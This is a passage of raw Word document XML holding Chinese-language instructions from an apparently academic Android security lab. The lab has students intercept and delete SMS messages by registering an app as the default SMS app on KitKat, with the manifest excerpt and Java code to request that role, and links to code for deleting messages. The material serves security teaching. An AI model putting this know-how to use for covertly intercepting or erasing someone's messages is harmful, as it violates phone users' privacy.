          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>从</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>android KitKat</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>版本开始，有一个安全改进，只有</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Default SMS app</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>才能</w:t>
      </w:r>
      <w:r w:rsidR="00F545F3">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>截获</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>短信</w:t>
      </w:r>
      <w:r w:rsidR="00F545F3">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>并使其不出现在</w:t>
      </w:r>
      <w:r w:rsidR="00DD6794">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>手机数据库中</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="00E21099">
          <w:rPr>
            <w:rFonts w:eastAsia="宋体"/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>http://stackoverflow.com/questions/25988574/delete-sms-from-android-on-4-4-4-affected-rows-0zero-after-deleted</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> “Unless your app is marked as default SMS app in device, you won</w:t>
      </w:r>
      <w:r w:rsidR="00F545F3">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>t be able to play with SMS Provider, please read SMS guidelines for the same for KITKAT”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D65EE2" w:rsidRDefault="009336F3" w:rsidP="00D65EE2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidR="00D65EE2" w:rsidRPr="00145E2D">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:eastAsia="宋体"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>http://stackoverflow.com/questions/20109450/abort-sms-intent-on-android-kitkat</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00D65EE2">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D65EE2" w:rsidRPr="000C44E6">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> You can't stop a message from showing in Default SMS application in kitkat. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D65EE2" w:rsidRDefault="00D65EE2" w:rsidP="00D65EE2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E21099" w:rsidRPr="00E21099" w:rsidRDefault="00D65EE2" w:rsidP="00E21099">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>因此请大家将</w:t>
      </w:r>
      <w:r w:rsidRPr="00F13438">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>SmsBroadCastReceiver</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>设为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Defa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">ult SMS App. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>这使得本实验中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>不再有隐蔽性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00E21099" w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>请参照以下博文：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E21099" w:rsidRPr="00E21099" w:rsidRDefault="00E21099" w:rsidP="00E21099">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>“做好准备，让你的短信应用迎接</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Android 4.4(KitKat)</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D65EE2" w:rsidRDefault="009336F3" w:rsidP="00E21099">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidR="00E21099" w:rsidRPr="00E21099">
          <w:rPr>
            <w:rFonts w:eastAsia="宋体"/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>http://blog.csdn.net/xyz_lmn/article/details/12836751</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00E21099" w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E21099" w:rsidRPr="00E21099" w:rsidRDefault="00E21099" w:rsidP="00E21099">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>该博文为以下英文博文的翻译：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E21099" w:rsidRPr="00E21099" w:rsidRDefault="009336F3" w:rsidP="00E21099">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidR="00E21099" w:rsidRPr="00E21099">
          <w:rPr>
            <w:rFonts w:eastAsia="宋体"/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>http://android-developers.blogspot.in/2013/10/getting-your-sms-apps-ready-for-kitkat.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00E21099" w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00E21099" w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>需要翻墙</w:t>
      </w:r>
      <w:r w:rsidR="00E21099" w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E21099" w:rsidRPr="00E21099" w:rsidRDefault="00E21099" w:rsidP="00E21099">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>将文中的</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>AndroidManifest</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>节选拷贝到你的</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>AndroidManifest.xml</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>文件中，</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21099" w:rsidRPr="00E21099" w:rsidTr="00E21099">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5263" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00E21099" w:rsidRPr="00E21099" w:rsidRDefault="00E21099" w:rsidP="00E21099">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E21099">
              <w:rPr>
                <w:rFonts w:eastAsia="宋体"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;manifest&gt;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&lt;application&gt;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 android:name=".SmsBroadCastReceiver"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android:permission="android.permission.BROADCAST_SMS"&gt;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android:name="android.provider.Telephony.SMS_RECEIVED"/&gt;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android:name="android.provider.Telephony.SMS_DELIVER"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BroadcastReceiver that listens for incoming MMS messages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 android:name=".MmsReceiver"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android:permission="android.permission.BROADCAST_WAP_PUSH"&gt;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android:name="android.provider.Telephony.WAP_PUSH_DELIVER"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android:mimeType="application/vnd.wap.mms-message"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Activity that allows the user to send new SMS/MMS messages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&lt;activity android:name=".ComposeSmsActivity"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android:name="android.intent.action.SEND"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android:name="android.intent.action.SENDTO"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android:name="android.intent.category.DEFAULT"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android:name="android.intent.category.BROWSABLE"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&lt;/activity&gt;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Service that delivers messages from the phone "quick response"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&lt;service android:name=".HeadlessSmsSendService"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android:permission="android.permission.SEND_RESPOND_VIA_MESSAGE"  </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E21099" w:rsidRPr="00E21099" w:rsidRDefault="00E21099" w:rsidP="00E21099">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E21099">
              <w:rPr>
                <w:rFonts w:eastAsia="宋体"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">                 android:exported="true"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android:name="android.intent.action.RESPOND_VIA_MESSAGE"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android:name="android.intent.category.DEFAULT"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&lt;/service&gt;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&lt;/application&gt;  </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E21099" w:rsidRPr="00E21099" w:rsidRDefault="00E21099" w:rsidP="00E21099">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E21099">
              <w:rPr>
                <w:rFonts w:eastAsia="宋体"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>&lt;/manifest&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E21099" w:rsidRPr="00E21099" w:rsidRDefault="00E21099" w:rsidP="00E21099">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E21099" w:rsidRPr="00E21099" w:rsidRDefault="00E21099" w:rsidP="00E21099">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>用以下</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>代码来设置本</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>App</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Default SMS App:</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21099" w:rsidRPr="00E21099" w:rsidTr="00E21099">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5263" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00E21099" w:rsidRPr="00E21099" w:rsidRDefault="00E21099" w:rsidP="00E21099">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E21099">
              <w:rPr>
                <w:rFonts w:eastAsia="宋体"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>public void onCreate(Bundle savedInstanceState)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super.onCreate(savedInstanceState);</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final String myPackageName = getPackageName();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Intent intent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new Intent(Telephony.Sms.Intents.ACTION_CHANGE_DEFAULT);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intent.putExtra(Telephony.Sms.Intents.EXTRA_PACKAGE_NAME,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myPackageName);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startActivity(intent);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r w:rsidRPr="00E21099">
              <w:rPr>
                <w:rFonts w:eastAsia="宋体"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:tab/>
              <w:t>Log.e("onCreate", "FAILED TO SET DEFAULT SMS APP!");</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lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E21099">
              <w:rPr>
                <w:rFonts w:eastAsia="宋体"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E21099" w:rsidRPr="00E21099" w:rsidRDefault="00E21099" w:rsidP="00E21099">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E21099" w:rsidRPr="00E21099" w:rsidRDefault="00E21099" w:rsidP="00E21099">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>启动本</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>App</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>时，会弹出一个对话框（假设你的</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>App</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>名字为</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>SMSTest</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）：</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41056348" wp14:editId="49007940">
            <wp:extent cx="3200400" cy="10763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E21099" w:rsidRPr="00E21099" w:rsidRDefault="00E21099" w:rsidP="00E21099">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>点击</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Yes,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>SMS</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>应用界面显示</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E21099" w:rsidRPr="00E21099" w:rsidRDefault="00E21099" w:rsidP="00E21099">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06BE99E0" wp14:editId="5F3D5CF2">
            <wp:extent cx="3209925" cy="10477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1047750"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E21099" w:rsidRPr="00E21099" w:rsidRDefault="00E21099" w:rsidP="00E21099">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>此时就可以利用这个链接中的代码来删除短信了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E21099" w:rsidRPr="00E21099" w:rsidRDefault="00E21099" w:rsidP="00E21099">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Android</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>删除短信的方法“</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E21099" w:rsidRPr="00E21099" w:rsidRDefault="009336F3" w:rsidP="00E21099">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="0000FF"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidR="00E21099" w:rsidRPr="00E21099">
          <w:rPr>
            <w:rFonts w:eastAsia="宋体"/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>http://blog.csdn.net/beijingshi1/article/details/9094325</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E21099" w:rsidRPr="00E21099" w:rsidRDefault="00E21099" w:rsidP="00E21099">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C869EE" w:rsidRDefault="00E21099" w:rsidP="000C44E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Android</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的这个改进意味着恶意软件不能悄悄地改动手机的短信记录而不引起用户的注意，这对这个</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Lab</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
